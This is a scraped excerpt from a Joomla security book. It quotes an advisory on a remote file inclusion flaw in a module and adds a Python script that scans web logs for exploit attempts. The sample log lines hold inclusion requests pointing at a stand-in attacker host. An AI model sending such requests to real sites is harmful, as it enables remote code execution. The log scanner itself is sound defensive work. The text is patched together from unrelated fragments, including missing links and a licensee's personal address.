tailieunhanh - Joomla Security, part 3
Check your physical security, you and your employees: how much "information" are you leaking? The author uses the term "coffee-house" rule to describe a method of communicating in public.

This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave. Topeka 66604

Chapter 1

User Management

When you set up your site, there are several different methods to manage users and their permissions. The permutations are numerous, and I would suggest you pick up a copy of Barrie North's book The Joomla Admin Manual A Step by Step Guide to a Successful Website or Joomla A User's Guide. You can find both of these at or

Later we are going to learn about tools to help you post-install. However, if you have taken these steps, you are doing very well indeed.

Common Trip Ups

While an entire volume could be filled with common mistakes, we'll focus on a few of them here. They are presented here in no particular order.

Failure to Check Vulnerability List First

One big problem comes in if you are using a component that is vulnerable. To start with, why would we deliberately set up our site to be broken into? A quick review of the current vulnerability list shows, at the time of writing, over sixty known vulnerable extensions. Here is one chosen at random, known as AutoStand. I followed the link listed in Joomla and found the security site FrSIRT. They list this as a critical exploit.

Advisory ID: FrSIRT ADV-2007-1392
CVE ID: CVE-2007-2319
Rated as: High Risk
Remotely Exploitable: Yes
Locally Exploitable: Yes
Release Date: 2007-04-16

A vulnerability has been identified in AutoStand module for Joomla which could be exploited by remote attackers to execute arbitrary commands.
This issue is caused by an input validation error in the script that does not validate the mosConfig_absolute_path parameter which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.
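
The parameter named in the advisory is a server-side path setting, so a request that supplies it in the query string is worth flagging when reviewing web server logs. The following is an added example, not code from the book or from Joomla: it scans access-log lines for such requests. The log lines, client addresses, host names and the module path mod_example.php are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in common log format; addresses, hosts and the
# module path are placeholders, not values from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Apr/2007:10:01:02 +0000] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 5120
203.0.113.9 - - [16/Apr/2007:10:02:11 +0000] "GET /modules/mod_example.php?mosConfig_absolute_path=http://attacker.example/x.txt HTTP/1.1" 200 312
203.0.113.9 - - [16/Apr/2007:10:02:15 +0000] "GET /modules/mod_example.php?mosConfig%5Fabsolute%5Fpath=ftp%3A%2F%2Fattacker.example%2Fx HTTP/1.1" 200 298
198.51.100.4 - - [16/Apr/2007:10:03:40 +0000] "GET /modules/mod_example.php?mosConfig_absolute_path=/var/www HTTP/1.1" 403 199
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)
PARAM = "mosConfig_absolute_path"  # parameter named in the advisory


def find_override_attempts(log_text):
    """Return one finding per request that supplies PARAM in its query string."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        client, _method, target, status = match.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes names and values, so encoded spellings
        # of the parameter name are caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name != PARAM:
                continue
            findings.append({
                "client": client,
                "path": parts.path,
                "value": value,
                # A value with a URL scheme points the include at a remote host.
                "kind": "remote-url" if SCHEME_RE.match(value) else "local-path",
                "status": int(status),  # 200 deserves a closer look than 403
            })
    return findings


if __name__ == "__main__":
    for finding in find_override_attempts(SAMPLE_LOG):
        print(finding)
```

Only query strings appear in access logs, so a request that carries the parameter in a POST body will not be seen by this scan.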